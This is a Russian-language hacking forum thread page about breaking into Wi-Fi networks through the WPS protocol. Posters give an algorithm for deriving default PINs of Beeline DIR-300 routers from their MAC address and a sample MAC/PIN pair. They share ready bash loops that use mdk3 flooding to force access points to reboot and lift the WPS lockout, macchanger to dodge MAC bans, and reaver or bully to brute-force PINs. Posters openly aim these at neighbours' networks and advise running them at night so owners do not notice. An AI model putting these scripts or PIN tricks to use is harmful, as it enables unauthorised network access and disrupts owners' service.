Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    72
    Reputations:
    0
    какая ещё закономерность? :) только у кинетиков такие пины(т.е первод из 16 в 10)другие производители от фонаря придумывают пины......поэтому к ним генератор толку применять то :) всё равно пин не такой будет,как его переведёт генератор :)
     
  2. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,304
    Likes Received:
    8,628
    Reputations:
    114
    Из моего опыта, закономерность есть также в DIR-300 от билайна, но алгоритм вычисления немного отличается. Если нужно, объясню.
     
    quite gray likes this.
  3. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    72
    Reputations:
    0
    ну я даже на своём дир 300 пробовал по маку перевести,что бы пин получился,пин абсолютно другой.Потому что все производители,кроме кинетиков пин не по маку делают,а в тп линках вообще можно свой пин придумывать :)
     
  4. 4pips

    4pips Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    526
    Likes Received:
    1,404
    Reputations:
    40
    Да, если можно, то про билайновские роутеры хотелось бы узнать.
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,304
    Likes Received:
    8,628
    Reputations:
    114
    С ними всё также просто, как с зукселями. Берём вторую часть мака, переводим в 10-ную систему, прибавляем число 756992, и берём по модулю 10000000.

    Но это актуально только для DIR-300 с билайновской прошивкой. Их мак адрес, как правило, начинается с 2C:AB:25. И по умолчанию WPS отключён.

    Алгоритм преобразования мака в пин может быть сколь угодно сложным. Перевод из 16 в 10 это лишь один из простейших. Неожиданно, не так ли?)
     
    #1525 binarymaster, 20 Jan 2014
    Last edited: 20 Jan 2014
    quite gray likes this.
  6. Klaatu

    Klaatu Member

    Joined:
    21 Nov 2012
    Messages:
    554
    Likes Received:
    69
    Reputations:
    8
    Делюсь интересным опытом.
    Как вы знаете, есть точки, которые лочат wps через определенное количество попыток до следующей перезагрузки. Однако, даже после перезагрузки, такие точки в wash все равно продолжают показываться как залоченые. Не знаю, с чем это связано, то ли защита такая, то ли, что более вероятно, криворукие китайцы такое поведение напрограмили. До недавнего времени, я бросал такие точки по понятным причинам. Но тут мне стало интересно, зачем в reaver и bully существует опция -L
    Я начал разбираться, и понял, что атаку на wps по некоторым точкам с таким поведением, как я описал выше, можно продолжить. Снова десять попыток и снова блокировка до перезагрузки. Далее, вспомнил про mdk3, попробовал напустить ее на такую точку, и о чудо - она перезагрузилась после непродолжительной атаки(10-15секунд). Ну а дальше требовалось просто автоматизировать процесс перебора десяти пинов, атаки mdk для перезагрузки, и снова перебор итд.....Это было уже дело техники. Сделать это можно примерно так:
    Code:
    while true
    do
    timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
    sleep 10
    timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
    sleep 3
    done
    
    Одна точка уже сдалась - тупилинк841. Вторая в процессе, судя по мак - это тоже какой-то тупилинк. Так что метод рабочий, по крайней мере для некоторых девайсов этого производителя. Единственное что - нужно не жадничать, и стараться запускать скрипт исключительно в ночное время, а рано утром выключать, т.к. хозяину ТД вряд ли могут понравиться постоянные её перезагрузки, и соответственно, невозможность нормально пользоваться wifi.
     
    quite gray, user100 and 4pips like this.
  7. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    355
    Likes Received:
    134
    Reputations:
    16

    Спасибо за информацию, я поначалу думал что их надо вручную перезагружать хозяину после mdk3 атаки.

    На точке которая в нашем дворе не прокатило. После нескольких перезагрузок продолжает показывать wps, в винде предлагается нажать wps кнопку а вот ривер не идет, аиреплай говорит "Association denied (code 20). Вы с таким не встречались?
     
  8. Klaatu

    Klaatu Member

    Joined:
    21 Nov 2012
    Messages:
    554
    Likes Received:
    69
    Reputations:
    8
    Нет, точек с таким поведением я не видел. Без работающей ассоциации работа протокола wps невозможна. Поэтому непонятно, зачем точка блокирует ассоциацию, при этом показывая, что wps включен. Хотя, возможно, что именно таков и был алгоритм, и ассоциация вместе с wps заработает после нажатия кнопки wps на роутере, о чем и сообщает винда.
    В любом случае, без работающей ассоциации, удаленно с такой точкой ничего через wps сделать не получится, увы.
     
  9. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    355
    Likes Received:
    134
    Reputations:
    16
    Подумал, скорее всего это бан по мак адресу, а впс в винде срабатывал видимо потому что она ставит встроенный адаптер на первое место, а я в бэктрэке юзаю только внешний. Можете написать скрипт который во время перезагрузки точки заодно меняет мак адрес адаптера на рандомный тк программист из меня никакой. Спасибо :)
     
    #1529 Vikhedgehog, 21 Jan 2014
    Last edited: 21 Jan 2014
  10. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    72
    Reputations:
    0
    как всё таки приятно работать с сетями,когда сухо,солнечно,сигналы от точек просто супер :)
     
  11. Stranger@

    Stranger@ Member

    Joined:
    10 Jul 2012
    Messages:
    78
    Likes Received:
    5
    Reputations:
    0
    У меня такое было с Tp-linkom, тоже не мог понять почему не проходит ассоциация в reaver, пока не разобрался, клиент отключает пин-код роутера, а ставит произвольный свой, reaver показывает наличие открытого WPS, а асосцииацию невозможно произвести, ни с помощью reaver, ни с aireplay-ng.
    [​IMG]
     
    #1531 Stranger@, 21 Jan 2014
    Last edited: 21 Jan 2014
  12. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    355
    Likes Received:
    134
    Reputations:
    16
    Не совсем понял, чтоб wps отключился нужно чтоб вмешивался хозяин точки? И можно ли как-то вычислить новый PIN и потом запустить ривер с мак адресом уже подключенного компьютера чтоб получить пароль?
     
  13. Klaatu

    Klaatu Member

    Joined:
    21 Nov 2012
    Messages:
    554
    Likes Received:
    69
    Reputations:
    8
    Code:
    while true
    do
    timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
    ifconfig mon0 down
    macchanger -r mon0
    ifconfig mon0 up
    sleep 10
    timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
    sleep 3
    done
     
  14. paulo

    paulo Member

    Joined:
    6 Dec 2011
    Messages:
    241
    Likes Received:
    45
    Reputations:
    1
    Расскажите пожалуйста "на пальцах",что куда вводить. столкнулась с такой проблемой,что через 10 пинов точка уходит в лок ,обычно на сутки,но с помощью команды mdk3 ,я брала в пример Вашу,точка перезагружается,и снова позволяет пробить 10 пинов. как можно это сделать в автоматическом режиме? точнее-что куда прописать,и пользуюсь я ривером,не bully.
     
  15. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    355
    Likes Received:
    134
    Reputations:
    16
    Спасибо)

    Я когда попробовал сделать также в настройках (TL-WR841N) ассоциация продолжала работать, отключить пин код маршрутизатора = просто залочило wps. Так что видимо код 20 это что то другое. Или может прошивка какая-то особенная, не знаю.
     
  16. Klaatu

    Klaatu Member

    Joined:
    21 Nov 2012
    Messages:
    554
    Likes Received:
    69
    Reputations:
    8
    в командной строке в kali linux копируешь и вставляешь одной строкой:
    Code:
    while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done;
     
  17. ohoo

    ohoo New Member

    Joined:
    26 Dec 2013
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    а как в бактраке запустить этот скрипт
     
  18. Mr1perfeckt

    Mr1perfeckt Banned

    Joined:
    3 Mar 2013
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    D8:EB:97:1F:3F:11 TRENDnet651

    Кто поможет подобрать пин?
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,304
    Likes Received:
    8,628
    Reputations:
    114
    Недавно пробовал подобрать пин к точке от акадо, по маку тоже начинающейся с D8:EB:97. Так и не подобрал. Перебрало все варианты первой части (2 раза пробовал), видимо возможность заблокирована из настроек роутера.

    Да и по этому маку у меня очень маленькая статистика, всего одна запись в базе :(
    D8:EB:97:14:12:CD | 31850483
     
    #1539 binarymaster, 21 Jan 2014
    Last edited: 21 Jan 2014
  20. 4pips

    4pips Elder - Старейшина

    Joined:
    15 Sep 2013
    Messages:
    526
    Likes Received:
    1,404
    Reputations:
    40
    Из моих наблюдений, на Тренднет нужно ходить с булли: плохо они риверу отвечают и даже были случаи (специально проверял) риверу не отдают PSK, а булли отдают.
    Я только одну точку встречал с D8:EB:97 и тоже именно с булли открыл, причем без заморочек. Но провайдер был не акадо.
     
Loading...